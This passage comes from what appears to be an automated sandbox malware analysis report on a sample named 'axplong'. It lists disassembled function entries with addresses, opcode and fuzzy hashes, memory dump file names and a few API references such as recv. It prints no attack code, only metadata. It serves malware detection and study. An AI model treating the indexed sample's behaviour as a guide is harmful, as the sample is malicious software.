Opcode Fuzzy Hash: 26a35a7d23b06e3e75063fb89b49a19fe8bda53dcddc5cf38a56beeec7607e64
Instruction Fuzzy Hash: 16F02BBB13C504BFB142C585AF149FA675FEBC87307308526F403C3102D3E449468121

Function 052A0D39 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4921013041.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20156df1021eef98da094f4764860150f7f31b8019f7233f55e3def7c31261f7
Instruction ID: 4b25b51ce21b91a4d8da67831ece23e8375412ff05ddd4bdc02f8ef1bb4a5e6f
Opcode Fuzzy Hash: 20156df1021eef98da094f4764860150f7f31b8019f7233f55e3def7c31261f7
Instruction Fuzzy Hash: 47F027AF57C590BFB203C58069895F9BBABECD57303304567F043C0402D6C82A0A9122

Function 052A0CEE Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4921013041.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3194bece0df43d78df4411c60d77770ac36036f2ebc949eac23706b409be1a3
Instruction ID: a0ef3f8187bca285292d105f68db99cce6942eceb059a1fba8d0b7208a211d91
Opcode Fuzzy Hash: f3194bece0df43d78df4411c60d77770ac36036f2ebc949eac23706b409be1a3
Instruction Fuzzy Hash: 9ED02EBF93C880AFB242C9C2BA086FC6746D8D87303318E2BF002C0000EB881A4A5122

Function 052A0D0D Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4921013041.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a00702f9e8addaa864cbbe41a6b04d5e0b78edf2ec5f0fc12e7948258860f545
Instruction ID: c491605a14cd03af6d23a3a7fc866bdd167d45bb5a5ac2916c2817147acf4d27
Opcode Fuzzy Hash: a00702f9e8addaa864cbbe41a6b04d5e0b78edf2ec5f0fc12e7948258860f545
Instruction Fuzzy Hash: 30C08C7B838A94EB9382A5D050090B4FA52EE087217100A0AE043014109AA023028602

Function 052A0D1E Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4921013041.00000000052A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_52a0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16c392f5d94b511199f576ae442108354bb9fe7cefca0de854263a4bd2f357b4
Instruction ID: 55b137ab188b9bd7c816fa92310a7c0601e6e4f27bca63d27289bf29cd1b4001
Opcode Fuzzy Hash: 16c392f5d94b511199f576ae442108354bb9fe7cefca0de854263a4bd2f357b4
Instruction Fuzzy Hash: 19C02B9B23098CDF414374A140881662D8FDB083003B04305B103808408BF02142C205

Non-executed Functions

Function 00A13068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00A131E3

Strings

1#QNAN, xrefs: 00A14381
1#INF, xrefs: 00A1439E
1#IND, xrefs: 00A14373
1#SNAN, xrefs: 00A1437A

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: f3ba68f3b6f5044cd67553e7268fca2a9fe9ab516c53d083596bb5c05fb59928
Instruction ID: 2dc4df90d89df7c5a3b0b7a7fc273a685821d484b3c61f4e7c5ecdeea16f692e
Opcode Fuzzy Hash: f3ba68f3b6f5044cd67553e7268fca2a9fe9ab516c53d083596bb5c05fb59928
Instruction Fuzzy Hash: 50C2F872E086288FDF25CF28DD407EAB7B9EB48355F1441EAD84DA7240E775AE858F40

Function 009DDFD0 Relevance: 4.6, APIs: 3, Instructions: 102networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(?,?,00000004,00000000), ref: 009DE01B
recv.WS2_32(?,?,00000008,00000000), ref: 009DE050

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 592319509430c6d18de0b868df2b4bef830c8bce56c87081270cb3759ef123a9
Instruction ID: 349ce072617ec22542bb041e8ab487ecd107d3c53608d30388706ce0db68ccd7
Opcode Fuzzy Hash: 592319509430c6d18de0b868df2b4bef830c8bce56c87081270cb3759ef123a9
Instruction Fuzzy Hash: FD31F6B1A442489BD710DBA8DC81BEBB7ACEB0C724F044626F511E7391CA75AC46CBA0

Function 00A12BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 249e2dfe1ffc034096cf4f9d7dadacc08bd01f49833132fe59c81065de27749b
Instruction ID: b4de456ab99ed9a97eb3db53a67184c7fbc15aaed57eb4b92fd2f7cbd35919eb
Opcode Fuzzy Hash: 249e2dfe1ffc034096cf4f9d7dadacc08bd01f49833132fe59c81065de27749b
Instruction Fuzzy Hash: 6BF13C71E012199FDF14CFA9D9807EEBBB1EF48314F158269E819AB384D731AE518B90

Function 009ECB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,009ECE82,?,?,?,?,009ECEB7,?,?,?,?,?,?,009EC42D,?,00000001), ref: 009ECB33

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: afb0e00bc0f855df8b8d2f843cfc5df7b07e133118d0fcbdc930fd9eef624ee1
Instruction ID: af54af046a8eebe652db87eb3327a04f713f23595b524d7d2a25b5c5bf68c0f8
Opcode Fuzzy Hash: afb0e00bc0f855df8b8d2f843cfc5df7b07e133118d0fcbdc930fd9eef624ee1
Instruction Fuzzy Hash: B8D02232A1217C93CA122BEDFC098ECBB0C8F00B203490123FD04231218AA05D038BD0

Function 00A07D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00A07EFF

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: ff6a66a62b1d350f4186cbe8e8211aa5c45f21afb3b8c797b075b5dff0e42310
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: B2518770E0D60D6BDB398B38F99A7BE67AA9F51300F180459E482DB6C2CA31BD45C752

Function 009D4CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3450cf043de5bdb4431aba50f663947772e387e01b66695b45aef89d938e04c7
Instruction ID: 82228ce2c10ba21eccbfa621b15e5da91acc9e0eb8993fe68249c0db7cb1305b
Opcode Fuzzy Hash: 3450cf043de5bdb4431aba50f663947772e387e01b66695b45aef89d938e04c7
Instruction Fuzzy Hash: 452250B3F516144BDB4CCB9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158644

Function 00A16F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6233ee46f3b213a196f44503666e99e7d10f7df85d211ee96c1e9263092248d
Instruction ID: 55506dd1afbe7251c09201752cc62239bf0149cef628559609f39da4045c2abe
Opcode Fuzzy Hash: c6233ee46f3b213a196f44503666e99e7d10f7df85d211ee96c1e9263092248d
Instruction Fuzzy Hash: EDB16D31214605DFD715CF28C486BA97BF1FF49364F299658E89ACF2A1C336E982CB40

Function 009D4AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f69aa7104906786b8e478789552ad69ec972b0e94a9d9fc0e8cbecd9dccc852d
Instruction ID: 929b8ac2b6be3c55c6b79927ff8483aa9c376bf34a5dda2f903d7e8fc15466ca
Opcode Fuzzy Hash: f69aa7104906786b8e478789552ad69ec972b0e94a9d9fc0e8cbecd9dccc852d
Instruction Fuzzy Hash: AF51A1716093918FD319CF2D851523ABBE1AFD5200F084AAEF4D687292D774DA44CBA2

Function 009E85B0 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8afd90000e968ce6b7d72f0feccd020e5c1a764676eff837c1e05d8d9c272ca7
Instruction ID: ac5ffa515d390917eb1233d942db26357e761a35ee10b7bbcd51bf3e8f7a3771
Opcode Fuzzy Hash: 8afd90000e968ce6b7d72f0feccd020e5c1a764676eff837c1e05d8d9c272ca7
Instruction Fuzzy Hash: 5041B1316042559FDF19CF99D880BABBBB5FB8A704F00056DE8199B341DB72AD05CBD1

Function 00A1777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c91e56e7170fe7c5dbbaa5f94c463cd883efa87a4219bbc0554d34417b84811
Instruction ID: 441bacfca18f1a4e39ec3b8a9210302c2477093cd4e01dbecd76a9bf217761ba
Opcode Fuzzy Hash: 6c91e56e7170fe7c5dbbaa5f94c463cd883efa87a4219bbc0554d34417b84811
Instruction Fuzzy Hash: CA21B673F204394B770CC47E8C572BDB6E1C78C541745423AF8A6EA2C1D968D917E2E4

Function 00A1765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d16661ed35539f4c7d35415e72e3d8294638bce41704ca78fce38ef583ce7ff
Instruction ID: db4b8af0027b9aac51fa42100c5d0cfee0b73ef706a60d94face0ef2313e579f
Opcode Fuzzy Hash: 7d16661ed35539f4c7d35415e72e3d8294638bce41704ca78fce38ef583ce7ff
Instruction Fuzzy Hash: C6117723F30C255A675C817D8C172BAA5D2DBD825071F533AD826E7284E994DE23D290

Function 00A18720 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CE1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4823170685.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4833765550.0000000000E7A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4834028730.0000000000E7C000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_9d0000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction ID: d5b24d7c57904a9c473b13f9780c3fb53cf1ba9573a8d01393efac22a255c5f7
Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
Instruction Fuzzy Hash: A011087B20014247D614872DD9F85F6A796EBC5321B3C437AD1814B7D8DA3A99C5D900

Function 00A0645B Relevance: .0, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.4792704599.00000000009D1000.00000040.00000001.01000000.00000007.sdmp, Offset: 009D0000, based on PE: true

Associated: 00000006.00000002.4792178627.00000000009D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4792704599.0000000000A32000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4795540825.0000000000A39000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000A3B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000BBF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000C9A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CCB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.4796625907.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
